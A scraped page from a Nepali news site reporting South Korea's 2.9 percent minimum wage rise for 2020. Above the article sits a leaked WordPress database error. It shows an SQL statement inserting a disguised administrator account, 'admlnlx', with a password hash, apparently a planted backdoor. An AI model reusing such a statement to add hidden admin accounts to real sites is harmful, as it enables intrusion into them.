WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9Y/fzYQyW.T1/zlhyN0x/buvh3O26/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 14:55:47', '', 'admlnlx', 'admlnlx')

कोरियामा मासिक न्यूनतम ज्याला बढ्यो – Gaule Khabar

कोरियामा मासिक न्यूनतम ज्याला बढ्यो

कोरियामा मासिक न्यूनतम ज्याला बढ्यो

गाउँले न्युज, २९ असार, काठमाडौं । दक्षिण कोरियाले न्यूनतम पारिश्रमिक बृद्धि गरेको छ । बढेको ज्याला कार्यान्वयनमा आउनका लागि संसदबाट पारित हुनुपर्नेछ । अगस्ट ५ को संसदले पारित गरेमा श्रमिकले आगामी बर्षको जनवरीदेखि डिसेम्बरसम्मको ज्याला २.९ प्रतिशत बढ्ने श्रम तथा रोजगार मन्त्रालयले जनाएको छ ।

न्यूनतम पारिश्रमिक बृद्धि भएसँगै ईपीएसमार्फत कोरिया आएर कार्यरत ३३ लाख बढी कामदार लाभान्वित हुने छन् । सरकार, मजदुर संगठन र व्यवसायीका प्रतिनिधीबीच विहीबार भएको १३ घन्टा लामो छलफल निष्कर्षमा नपुगेपछि मतदानमार्फत तलब बृद्धिको निर्णय भएको हो ।

नयाँ पारिश्रमिक अनुसार श्रमिकले सन् २०२० का लागि प्रतिघन्टा ८ हजार ५ सय ९० वन(७.३२ डलर) पाउने छन् । यस बर्षको न्यूनतम ज्याला प्रतिघण्टा ८ हजार ३ सय ५० वन छ ।

ज्याला बृद्धि भएसँगै साताको न्यूनतम ४० घन्टा नघटाई मासिक २०९ घन्टा काम गर्ने श्रमिकले १७ लाख ९५ हजार ३ सय १० वन अर्थात १ लाख ६६ हजार ७ सय ७१ रुपैंयाँ पाउने छन् । -कान्तिपुर दैनिकबाट

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका